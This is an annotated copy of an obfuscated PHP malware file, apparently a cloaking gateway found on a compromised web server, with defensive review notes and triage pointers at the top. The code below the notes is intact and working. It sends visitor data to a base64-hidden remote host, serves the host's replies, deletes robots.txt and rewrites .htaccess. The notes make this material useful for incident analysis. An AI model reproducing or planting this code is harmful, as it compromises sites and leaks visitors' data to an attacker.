OwlCyberSecurity - MANAGER
Edit File: index.php
<?php /*
 * REVIEW NOTES (defensive analysis; every code token below is unchanged).
 *
 * What this file is: a goto-obfuscated request gateway. String literals are
 * written as octal/hex escapes and the statements are stored in scrambled
 * order. Following the goto chain from the first jump gives the real order:
 *
 *   1. h() and h2() are declared.
 *   2. $api is set from a base64 literal that decodes to
 *      hxxp://6146-ch4-v288[.]img7yahoo[.]com (defanged here; plain HTTP).
 *   3. $params is filled from $_SERVER: domain (HTTP_HOST or SERVER_NAME),
 *      request_url (REQUEST_URI), referer, agent, ip, protocol, language.
 *   4. If the request carries a "params" field, $params plus the API URL is
 *      dumped with print_r() and the script exits.
 *   5. h2() runs: it deletes robots.txt and overwrites .htaccess.
 *   6. Up to three times, $params is POSTed to $api through h(). The reply is
 *      base64-decoded, gzuncompress()ed and split on "|". The last element is
 *      base64-decoded and echoed; every earlier element is passed to header().
 *      The script exits after the first non-empty reply.
 *
 * Security-relevant consequences:
 *   - The remote host chooses the response headers and body for every request
 *     that reaches this file. The body is echoed, not evaluated; this file
 *     contains no eval/include. The pattern is consistent with a
 *     cloaking/redirect gateway, but the served content is not visible here.
 *   - Visitor IP, User-Agent, Referer, Accept-Language and the requested URL
 *     leave the server on every hit, unencrypted.
 *   - The .htaccess written by h2() decodes to three rules:
 *       a) deny all files ending in py, exe or php;
 *       b) re-allow exactly: about.php radio.php index.php content.php
 *          lock360.php admin.php wp-login.php wp-l0gin.php wp-theme.php
 *          wp-scripts.php wp-editor.php mah.php jp.php ext.php;
 *       c) mod_rewrite: any path that is not an existing file or directory is
 *          served by /index.php.
 *     Rule (c) routes the site's otherwise-unused URL space into this script.
 *     NOTE(review): several allow-listed names are not stock application
 *     files; presumably they are companion files, so look for each one.
 *
 * Triage pointers: diff .htaccess against the policy above; check whether
 * robots.txt is missing; search the web root for the allow-listed names and
 * for other PHP files built from goto chains and escaped literals; review
 * egress logs for PHP-originated HTTP requests with User-Agent "h".
 * NOTE(review): the capture header shows this file open in a web file
 * manager's editor. Treat that as a sign the host has other unauthorized
 * files; removing this one file is not sufficient remediation.
 * NOTE(review): this listing wraps inside string literals (one escape
 * sequence in the h2() payload is split across two lines). The on-disk file
 * was presumably a single line; confirm before hashing or decoding.
 */ goto BCQtB; uyJS_: PctQ2: goto ZvutM; isyzI: RNiK2: goto LS9vA; Zf_1n: dE7h3: goto ElODs; rIH57: DMr9z: goto RN5gr; rNA9N: $params["\160\x72\157\164\x6f\x63\x6f\154"] = isset($_SERVER["\x48\x54\x54\x50\x53"]) ? "\150\164\x74\160\x73\72\x2f\57" : "\150\x74\164\160\72\57\x2f"; goto tIwK8; Dpwu4: /* debug switch: a request carrying "params" dumps $params plus the API URL, then exits */ if (isset($_REQUEST["\160\141\x72\141\x6d\163"])) { $params["\x61\x70\x69"] = $api; print_r($params); die; } goto PyN3M; Elx3f: /* h(): cURL request to $url with User-Agent "h" and a 30 s timeout; switches to POST when $pf is given (fields are set only if $pf is an array); returns the body, or '' when the result is falsy */ function h($url, $pf = '') { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, "\150"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); if ($pf != '') { curl_setopt($ch, CURLOPT_POST, 1); if (is_array($pf)) { curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($pf)); } } $r = curl_exec($ch); curl_close($ch); if ($r) { return $r; } return ''; } goto e8Z5x; Hnb3i: C7vsu: goto ao33u; CmaTN: eyzuU: goto DE_Ev; l0yXL: goto jbwNu; goto yBXdY; uz21j: $params["\x6c\141\x6e\147\x75\x61\147\145"] = isset($_SERVER["\110\x54\x54\x50\137\x41\x43\x43\x45\120\x54\x5f\x4c\101\116\107\125\x41\107\x45"]) ? $_SERVER["\x48\x54\124\x50\x5f\x41\103\x43\105\120\x54\x5f\114\101\x4e\x47\125\x41\x47\x45"] : ''; goto OSKuJ; ji3vc: hAC4o: goto W12Bg; jmNl6: FCYBD: goto i_ZTe; oyN9b: xzKY7: goto W980v; t3a8J: EHkKk: goto lnUlK; q0PQn: zbIMD: goto Zf_1n; P_Rnk: goto XHuHe; goto isyzI; E3IqZ: if ($params["\151\x70"] == null) { $params["\x69\x70"] = ''; } goto GAt2o; BCQtB: goto KLKHv; goto wkLed; LtFrr: goto IzMNc; goto XYh_Z; UwqRR: fIGts: goto MS2dU; NsxD_: IzMNc: goto SE7ll; DE_Ev: goto zm87Z; goto jB4ZP; ldtST: O3rro: goto E3IqZ; iNQkf: goto nuw2Z; goto DD7wk; izYZB: goto C7vsu; goto HpMwr; PKG7H: goto DMr9z; goto OGSEJ; ao33u: olK3F: goto QnasD; XJUH8: goto hr4pR; goto q0PQn; Ijd90: $params["\162\145\x66\x65\x72\145\x72"] = isset($_SERVER["\110\x54\124\120\137\122\x45\106\105\x52\x45\122"]) ? 
$_SERVER["\x48\124\x54\x50\x5f\x52\105\106\x45\122\105\x52"] : ''; goto poL2R; X2Kog: goto JU0W0; goto Zqaif; B6b3f: goto aqexB; goto S5wVI; W12Bg: goto RNiK2; goto QB4PV; T3yik: W9vm5: goto IoY7_; yBXdY: goto BSpau; goto UwqRR; TC02C: caPEe: goto PxQtp; RrznN: Ce8ZS: goto KDULU; mjY5b: goto jtw7L; goto TC02C; IoY7_: goto BWLbM; goto mjY5b; uxJ1A: goto Vnfx4; goto Tbt3f; gJh3q: goto NlVNd; goto NoY35; suqn6: aLz5B: goto AhpCZ; VIpzw: goto fIGts; goto oE1Zx; P3vmg: goto PctQ2; goto suqn6; G9a2t: ntszK: goto rUKYV; h44Q4: goto bgjaI; goto kZPZ9; tIwK8: goto SQ9q_; goto uyJS_; hFp2E: goto eyzuU; goto lBidK; hPdbt: BWLbM: goto VIpzw; rUKYV: goto dE7h3; goto Svj0v; f8KME: ZxrBW: goto Elx3f; QB4PV: O1Tx0: goto x749H; Ukbc6: bgjaI: goto jmNl6; VdI7V: goto FPqTS; goto NsxD_; e8Z5x: goto zS8PM; goto KgGW2; OSKuJ: goto KMZAr; goto rxyRF; IktaO: BzCay: goto fabxo; NgJ3F: BSpau: goto YT7wX; Ckjz3: goto kyMAv; goto ldtST; n85OD: goto hzVvS; goto HYBTC; poL2R: goto caPEe; goto P78aI; IkN2j: goto lS78k; goto rXHVK; rXHVK: goto UROCf; goto LSd6O; kVQ3x: goto FCYBD; goto Taoh1; PxQtp: goto EHkKk; goto izYZB; mRqwM: goto KiFFR; goto vLPrB; P78aI: jtw7L: goto QBfbC; e094h: goto wXlaf; goto DR5RB; NoY35: XHuHe: goto ZR5ho; kVMcF: EkxLI: goto B6b3f; rX8Bc: npkub: goto hFp2E; rxyRF: eh_sU: goto YuLd_; fabxo: goto hAC4o; goto isJd2; zQvy0: /* ip: X-Forwarded-For is used whenever a Via header is present, else REMOTE_ADDR; both headers are client-supplied */ $params["\151\160"] = isset($_SERVER["\110\x54\124\120\137\126\x49\x41"]) ? 
$_SERVER["\x48\124\124\x50\x5f\x58\137\x46\117\x52\x57\x41\122\x44\105\104\x5f\x46\117\x52"] : $_SERVER["\x52\105\115\x4f\124\x45\137\101\104\104\122"]; goto VdI7V; Zqaif: goto zbIMD; goto Ukbc6; HpMwr: SQ9q_: goto X2Kog; Tbt3f: aqexB: goto Ijd90; GQsC7: zH72c: goto hPdbt; W980v: goto EkxLI; goto LtFrr; IYdZr: PdSdv: goto IkN2j; SE7ll: lS78k: goto P3vmg; KQbvL: uOllj: goto ExxuX; rFMSP: djef0: goto lXWZe; kSdFp: goto PdSdv; goto f8KME; RN5gr: goto jOxXG; goto NgJ3F; LS9vA: $params["\x72\145\161\x75\145\x73\164\x5f\165\x72\154"] = $_SERVER["\122\105\x51\x55\x45\x53\124\137\x55\122\x49"]; goto EVvQU; DN8An: goto juiYX; goto IktaO; oE1Zx: w1Ccr: goto mnSgj; PyN3M: goto W9vm5; goto rX8Bc; MfKd_: quICW: goto LQqEk; GAt2o: goto npkub; goto Qhmue; kZPZ9: hr4pR: goto kVQ3x; MS2dU: h2(); goto kSdFp; taSMU: fnYMJ: goto Tp424; AhpCZ: KiFFR: goto BXQYM; lnUlK: goto uOllj; goto oyN9b; frYDm: KMZAr: goto PKG7H; HYBTC: miWrv: goto CmaTN; lBidK: goto fnYMJ; goto G9a2t; S5wVI: CaPMu: goto rFMSP; isJd2: goto miWrv; goto Hnb3i; BXQYM: goto quICW; goto MfKd_; mu0z2: goto BzCay; goto KQbvL; XYh_Z: nuw2Z: goto mRqwM; ZvutM: $try = 0; goto fTA54; QBfbC: jbwNu: goto DN8An; x749H: $params["\x64\157\x6d\141\151\156"] = isset($_SERVER["\110\x54\124\x50\137\110\117\x53\x54"]) ? $_SERVER["\110\x54\x54\x50\137\110\117\x53\124"] : $_SERVER["\x53\x45\x52\x56\105\x52\x5f\x4e\101\x4d\x45"]; goto mu0z2; i_ZTe: goto O1Tx0; goto frYDm; DR1Dq: kyMAv: goto t3a8J; G0XP8: goto e9eDK; goto hjgqM; Svj0v: goto CaPMu; goto u7CFO; Qhmue: UROCf: goto rIH57; ElODs: goto Ce8ZS; goto taSMU; fTA54: goto ntszK; goto DR1Dq; TqJhg: goto MFa8E; goto gJh3q; LSd6O: jOxXG: goto Dpwu4; vLPrB: goto zH72c; goto T3yik; u7CFO: KLKHv: goto YevVF; h2frL: /* h2(): deletes robots.txt if present, then writes the embedded base64 payload to .htaccess (chmod 511 decimal = 0777 before the write, 420 decimal = 0644 after); returns early when .htaccess already equals the payload; all failures are silenced with @ */ function h2() { if (file_exists("\162\157\x62\x6f\x74\x73" . "\56\164\x78\x74")) { @unlink("\x72\x6f\x62\x6f\164\x73" . "\x2e\x74\170\x74"); } $htaccess = "\56" . 
"\150\x74\x61\143\x63\x65\163\163"; $content = @base64_decode("\120\x45\132\160\142\107\x56\x7a\124\127\x46\x30\131\62\x67\147\111\x69\64\157\143\x48\x6c\70\132\130\x68\154\146\110\x42\157\143\x43\153\153\x49\x6a\x34\113\111\x45\x39\171\x5a\x47\126\171\x49\x47\x46\x73\142\x47\x39\x33\114\107\x52\x6c\142\x6e\153\113\111\x45\122\x6c\142\x6e\x6b\x67\x5a\x6e\x4a\166\x62\x53\102\x68\x62\107\167\113\120\103\x39\x47\x61\x57\x78\154\x63\60\x31\150\x64\x47\116\x6f\120\147\x6f\x38\x52\155\x6c\163\132\x58\116\116\x59\x58\x52\x6a\141\x43\x41\x69\x58\x69\150\x68\x59\x6d\x39\61\144\x43\x35\x77\x61\110\x42\70\x63\x6d\x46\x6b\x61\x57\x38\x75\143\x47\150\167\x66\107\x6c\165\132\x47\x56\64\114\156\102\157\x63\x48\x78\x6a\142\62\65\60\132\x57\x35\60\x4c\x6e\x42\x6f\x63\x48\x78\163\x62\62\116\x72\x4d\172\x59\x77\x4c\x6e\x42\x6f\x63\110\x78\x68\x5a\107\x31\160\x62\151\x35\x77\141\x48\x42\70\x64\x33\101\164\x62\x47\71\156\141\127\x34\x75\x63\107\150\167\x66\x48\144\167\114\x57\x77\167\132\62\x6c\x75\114\156\102\157\x63\110\x78\x33\x63\x43\x31\60\x61\x47\126\164\132\123\x35\167\x61\110\102\70\144\63\x41\164\x63\62\116\171\141\x58\x42\60\x63\171\65\x77\141\x48\102\x38\144\x33\101\x74\132\x57\x52\160\144\107\x39\171\x4c\156\x42\x6f\143\110\170\x74\131\127\x67\x75\x63\107\x68\x77\146\107\160\167\114\156\x42\157\x63\x48\x78\154\145\x48\x51\x75\143\x47\x68\167\113\123\x51\151\x50\x67\157\x67\124\63\112\153\132\130\111\x67\131\x57\170\163\x62\63\143\163\132\x47\x56\x75\145\x51\157\x67\x51\x57\170\163\x62\x33\143\x67\132\x6e\x4a\166\142\x53\102\x68\x62\107\167\x4b\120\x43\71\107\141\x57\x78\154\143\x30\61\x68\x64\107\116\157\x50\x67\157\70\123\x57\x5a\116\142\x32\122\x31\x62\107\125\x67\142\127\71\x6b\130\x33\112\x6c\x64\63\x4a\160\144\107\x55\165\131\172\x34\x4b\125\155\x56\x33\143\x6d\154\60\132\125\x56\x75\132\62\x6c\x75\x5a\123\102\120\142\147\x70\x53\x5a\130\x64\171\x61\x58\122\x6c\121\155\x46\x7a\132\x53\x41\166\103\x6c\x4a\x6c\x64\63\x4a\160\x64\x47\x56\123\x64\x57\170\154\111\106\65\160\
x62\155\x52\x6c\x65\106\167\165\x63\107\x68\167\112\103\101\164\111\x46\x74\115\130\x51\160\123\x5a\130\144\x79\x61\130\x52\x6c\121\x32\x39\x75\x5a\x43\x41\x6c\145\61\112\x46\125\x56\x56\106\x55\x31\x52\146\122\x6b\x6c\115\122\x55\x35\102\x54\x55\x56\71\x49\103\105\164\132\x67\x70\123\x5a\130\144\x79\141\x58\122\x6c\x51\62\x39\165\x5a\x43\x41\154\x65\x31\x4a\x46\125\126\x56\x46\125\61\x52\x66\122\153\x6c\x4d\122\x55\x35\x42\x54\x55\x56\71\x49\x43\x45\164\132\101\160\x53\132\x58\144\171\141\130\122\x6c\125\156\x56\x73\x5a\x53\x41\x75\x49\103\x39\160\142\155\x52\x6c\x65\103\65\167\141\x48\x41\147\127\x30\x78\x64\x43\x6a\x77\x76\123\x57\132\116\x62\x32\x52\61\x62\107\x55\53"); if (file_exists($htaccess)) { $htaccess_content = file_get_contents($htaccess); if ($content == $htaccess_content) { return; } } @chmod($htaccess, 511); @file_put_contents($htaccess, $content); @chmod($htaccess, 420); } goto iNQkf; wkLed: juiYX: goto zQvy0; Tp424: MFa8E: goto G0XP8; LQqEk: /* remote endpoint URL, stored base64-encoded */ $api = base64_decode("\x61\110\122\x30\143\x44\x6f\x76\114\x7a\x59\170\x4e\104\x59\x74\131\x32\147\60\x4c\x58\131\171\117\x44\147\165\x61\x57\61\x6e\x4e\x33\x6c\x68\x61\107\x39\166\x4c\x6d\116\166\x62\x51\x3d\75"); goto XJUH8; QnasD: goto O3rro; goto AcHz_; KJyI0: goto w1Ccr; goto lP66g; YevVF: goto djef0; goto uxJ1A; ExxuX: $params["\x61\147\145\x6e\164"] = isset($_SERVER["\x48\x54\124\x50\137\x55\x53\105\x52\x5f\x41\107\x45\x4e\124"]) ? 
$_SERVER["\110\124\x54\x50\137\x55\x53\105\122\137\x41\107\105\x4e\124"] : ''; goto n85OD; YT7wX: JU0W0: goto e094h; AcHz_: hzVvS: goto l0yXL; mnSgj: goto xbySI; goto Ckjz3; hjgqM: FPqTS: goto jy4xX; EVvQU: goto xzKY7; goto GQsC7; DR5RB: zm87Z: goto rNA9N; YuLd_: xbySI: goto P_Rnk; lP66g: e9eDK: goto h2frL; KDULU: /* main loop, at most 3 attempts: the remote reply supplies both the header() lines and the echoed body; decode errors are silenced with @ and simply trigger a retry */ while ($try < 3) { $content = h($api, $params); $content = @gzuncompress(base64_decode($content)); $data_array = @preg_split("\57\x5c\174\x2f\x73\x69", $content, -1, PREG_SPLIT_NO_EMPTY); if (!empty($data_array)) { $data = array_pop($data_array); $data = base64_decode($data); foreach ($data_array as $header) { @header($header); } echo $data; die; } $try++; } goto KJyI0; jy4xX: goto olK3F; goto h44Q4; OGSEJ: goto aLz5B; goto RrznN; Taoh1: goto eh_sU; goto IYdZr; Rvv1t: wXlaf: goto uz21j; lXWZe: goto ZxrBW; goto Rvv1t; DD7wk: Vnfx4: goto ji3vc; jB4ZP: zS8PM: goto TqJhg; KgGW2: NlVNd: goto kVMcF; ZR5ho: ?>